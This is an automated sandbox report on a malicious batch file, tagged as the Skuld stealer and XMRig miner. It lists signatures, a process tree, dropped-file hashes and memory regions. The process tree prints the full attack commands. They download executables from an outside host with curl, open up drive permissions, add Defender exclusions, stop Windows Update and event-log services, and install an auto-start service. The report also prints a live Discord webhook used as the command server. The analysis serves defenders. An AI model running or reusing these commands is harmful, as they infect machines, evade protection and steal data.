Overview

overview

10

Static

static

3

pyra/Pyra.exe

windows10-2004-x64

10

pyra/data/data.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/04/2025, 12:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    pyra/data/data.bat

  • Size

    2KB

  • MD5

    cf53469fbe70862f8395e48088f5dc39

  • SHA1

    2c0061116ec9d52689a27930c22dafcb26a89f71

  • SHA256

    1dcdbb2c5ca99456ae680c7777226caa09b1cab8be979c69729a1c307d7b6806

  • SHA512

    c0900865407b40f98f873043978e0bd162fd81e36f163110565683a8bcf0ea16204bdfd26cf1216ce395bc2b002737a84ee8669ddd0cc4e226b778a70e7f8fe2

Score
10/10
skuldxmrigdefense_evasiondiscoveryexecutionminerpersistencestealerupx

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1357468186764775586/BRP230l-SHvQfTpsLO5GgfFtW8ZwDogt43OWww-lXchxPOAw7f7pT6n98q0MMIyhGHyc

Signatures

  • Skuld family
    skuld
  • Skuld stealer

    An info stealer written in Go lang.

    stealerskuld
  • Xmrig family
    xmrig
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner payload 12 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file 1 IoCs
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Executes dropped EXE 3 IoCs
  • Modifies file permissions 1 TTPs 26 IoCs
    discovery
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

    persistence
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • UPX packed file 17 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 46 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3884
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle Hidden -Command "Start-Process cmd -ArgumentList '/c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h' -WindowStyle Hidden"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\pyra\data\data.bat h
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1672
        • C:\Windows\system32\net.exe
          NET SESSION
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1216
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 SESSION
            5⤵
              PID:2436
          • C:\Windows\system32\where.exe
            where curl
            4⤵
              PID:1112
            • C:\Windows\system32\curl.exe
              curl -o "C:\Users\Admin\AppData\Local\file1.exe" "https://pyra.mov/test/test1" --silent --show-error
              4⤵
              • Downloads MZ/PE file
              PID:5588
            • C:\Windows\system32\curl.exe
              curl -o "C:\Users\Admin\AppData\Local\file2.exe" "https://pyra.mov/test/test2" --silent --show-error
              4⤵
                PID:5160
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:2404
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:2796
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:2916
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:4156
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:5044
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:5000
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:5820
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:5980
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:2188
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:744
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:2512
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:5968
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:4536
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:1380
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:5476
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:612
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:3436
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:952
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:2988
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:4300
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:4268
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:4332
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:1028
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:2120
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:3408
              • C:\Windows\system32\icacls.exe
                icacls "%driveLetter:\" /inheritance:r /grant:r "Everyone:F"
                4⤵
                • Modifies file permissions
                PID:4672
              • C:\Windows\system32\timeout.exe
                timeout /t 15 /nobreak
                4⤵
                • Delays execution with timeout.exe
                PID:2244
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file1.exe' -Verb RunAs"
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5648
                • C:\Users\Admin\AppData\Local\file1.exe
                  "C:\Users\Admin\AppData\Local\file1.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4556
                  • C:\Windows\system32\attrib.exe
                    attrib +h +s C:\Users\Admin\AppData\Local\file1.exe
                    6⤵
                    • Views/modifies file attributes
                    PID:1720
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\file2.exe' -Verb RunAs"
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:948
                • C:\Users\Admin\AppData\Local\file2.exe
                  "C:\Users\Admin\AppData\Local\file2.exe"
                  5⤵
                  • Executes dropped EXE
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5116
                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5604
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                    6⤵
                      PID:3196
                      • C:\Windows\system32\wusa.exe
                        wusa /uninstall /kb:890830 /quiet /norestart
                        7⤵
                          PID:5172
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop UsoSvc
                        6⤵
                        • Launches sc.exe
                        PID:6084
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        6⤵
                        • Launches sc.exe
                        PID:3680
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop wuauserv
                        6⤵
                        • Launches sc.exe
                        PID:5188
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop bits
                        6⤵
                        • Launches sc.exe
                        PID:5508
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop dosvc
                        6⤵
                        • Launches sc.exe
                        PID:1840
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        6⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1048
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        6⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4388
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        6⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1500
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        6⤵
                        • Power Settings
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6072
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe delete "BUZZLBYC"
                        6⤵
                        • Launches sc.exe
                        PID:4456
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe create "BUZZLBYC" binpath= "C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe" start= "auto"
                        6⤵
                        • Launches sc.exe
                        PID:3484
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe stop eventlog
                        6⤵
                        • Launches sc.exe
                        PID:4464
                      • C:\Windows\system32\sc.exe
                        C:\Windows\system32\sc.exe start "BUZZLBYC"
                        6⤵
                        • Launches sc.exe
                        PID:5196
            • C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe
              C:\ProgramData\oycwqqzuyrth\iixpziuhlnum.exe
              1⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1636
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4512
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                2⤵
                  PID:5480
                  • C:\Windows\system32\wusa.exe
                    wusa /uninstall /kb:890830 /quiet /norestart
                    3⤵
                      PID:5468
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop UsoSvc
                    2⤵
                    • Launches sc.exe
                    PID:4840
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop WaaSMedicSvc
                    2⤵
                    • Launches sc.exe
                    PID:5368
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop wuauserv
                    2⤵
                    • Launches sc.exe
                    PID:4504
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop bits
                    2⤵
                    • Launches sc.exe
                    PID:3320
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop dosvc
                    2⤵
                    • Launches sc.exe
                    PID:4176
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                    2⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2756
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                    2⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5044
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                    2⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5820
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    2⤵
                    • Power Settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2188
                  • C:\Windows\system32\conhost.exe
                    C:\Windows\system32\conhost.exe
                    2⤵
                      PID:2404
                    • C:\Windows\explorer.exe
                      explorer.exe
                      2⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3876

                  Network

                  MITRE ATT&CK Enterprise v15

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                    Filesize

                    2KB

                    MD5

                    6cf293cb4d80be23433eecf74ddb5503

                    SHA1

                    24fe4752df102c2ef492954d6b046cb5512ad408

                    SHA256

                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                    SHA512

                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    64B

                    MD5

                    40588a42cb8549ecc094e7d45f28c74c

                    SHA1

                    65d5d1f79fe82009c3c4c6d2c7ce874939926b8b

                    SHA256

                    787628c3dd129679416857bcb63c52f8477a02cfeadfe0d4d5d98eb7902c61d8

                    SHA512

                    e77dd348027e9df604520e228061f2e9c3d87ad695567c81dd95976eaba7df580eb565bff8b485558a0561bdd0de6ac202ead1965f6c23f746e5542ff9bea3c6

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Filesize

                    64B

                    MD5

                    446dd1cf97eaba21cf14d03aebc79f27

                    SHA1

                    36e4cc7367e0c7b40f4a8ace272941ea46373799

                    SHA256

                    a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                    SHA512

                    a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1nrx0qs0.ne1.ps1
                    Filesize

                    60B

                    MD5

                    d17fe0a3f47be24a6453e9ef58c94641

                    SHA1

                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                    SHA256

                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                    SHA512

                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                    Download Submit

                  • C:\Users\Admin\AppData\Local\file1.exe
                    Filesize

                    9.3MB

                    MD5

                    a8133dab079ce24c46a35749109d8f34

                    SHA1

                    455ac75b069b855bd3785a0f56d69276b8e83b01

                    SHA256

                    c8c36f079915be17e2c725b4247ceca4269e42fa6712f59d90147b103d60251e

                    SHA512

                    a57ecbda300a2a92c034177bf70cf441606ae9a68e1d0ec1be032921cea44d5fdfde23c5dfcf10dcc9b97a518b0a31d752fb24b344a5f80c30aa3e20e429ec06

                    Download Submit

                  • C:\Users\Admin\AppData\Local\file2.exe
                    Filesize

                    2.5MB

                    MD5

                    514e00d37d15901490a4974d59e63c96

                    SHA1

                    80575034e11501ad1fff1ad865234d109cbc6a16

                    SHA256

                    51371a9eb105df4a666f224347e377bc294358ad022d3c4a739fe3f65e09637d

                    SHA512

                    e55508411a803333cb67bb12a8b6f76b9f627a94de87263ba44e59e00e70722b938b3de5fc14bcd5d37871bbf760751ba973454eb077efdaae0a26b96138c255

                    Download Submit

                  • memory/628-12-0x00007FFB997A0000-0x00007FFB9A261000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/628-15-0x00007FFB997A0000-0x00007FFB9A261000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/628-0-0x00007FFB997A3000-0x00007FFB997A5000-memory.dmp

                    Filesize

                    8KB

                    Download

                  • memory/628-11-0x00007FFB997A0000-0x00007FFB9A261000-memory.dmp

                    Filesize

                    10.8MB

                    Download

                  • memory/628-1-0x000002C372F40000-0x000002C372F62000-memory.dmp

                    Filesize

                    136KB

                    Download

                  • memory/2404-88-0x0000000140000000-0x000000014000E000-memory.dmp

                    Filesize

                    56KB

                    Download

                  • memory/2404-89-0x0000000140000000-0x000000014000E000-memory.dmp

                    Filesize

                    56KB

                    Download

                  • memory/2404-90-0x0000000140000000-0x000000014000E000-memory.dmp

                    Filesize

                    56KB

                    Download

                  • memory/2404-91-0x0000000140000000-0x000000014000E000-memory.dmp

                    Filesize

                    56KB

                    Download

                  • memory/2404-92-0x0000000140000000-0x000000014000E000-memory.dmp

                    Filesize

                    56KB

                    Download

                  • memory/2404-95-0x0000000140000000-0x000000014000E000-memory.dmp

                    Filesize

                    56KB

                    Download

                  • memory/3876-106-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-98-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-111-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-96-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-107-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-113-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-105-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-104-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-101-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-108-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-103-0x0000000000640000-0x0000000000660000-memory.dmp

                    Filesize

                    128KB

                    Download

                  • memory/3876-102-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-100-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-112-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-99-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-97-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-110-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/3876-109-0x0000000140000000-0x0000000140835000-memory.dmp

                    Filesize

                    8.2MB

                    Download

                  • memory/4512-80-0x0000017A7A510000-0x0000017A7A52C000-memory.dmp

                    Filesize

                    112KB

                    Download

                  • memory/4512-79-0x0000017A7A2C0000-0x0000017A7A2CA000-memory.dmp

                    Filesize

                    40KB

                    Download

                  • memory/4512-78-0x0000017A7A2F0000-0x0000017A7A3A5000-memory.dmp

                    Filesize

                    724KB

                    Download

                  • memory/4512-77-0x0000017A7A2D0000-0x0000017A7A2EC000-memory.dmp

                    Filesize

                    112KB

                    Download

                  • memory/4512-81-0x0000017A7A4F0000-0x0000017A7A4FA000-memory.dmp

                    Filesize

                    40KB

                    Download

                  • memory/4512-85-0x0000017A7A540000-0x0000017A7A54A000-memory.dmp

                    Filesize

                    40KB

                    Download

                  • memory/4512-83-0x0000017A7A500000-0x0000017A7A508000-memory.dmp

                    Filesize

                    32KB

                    Download

                  • memory/4512-84-0x0000017A7A530000-0x0000017A7A536000-memory.dmp

                    Filesize

                    24KB

                    Download

                  • memory/4512-82-0x0000017A7A550000-0x0000017A7A56A000-memory.dmp

                    Filesize

                    104KB

                    Download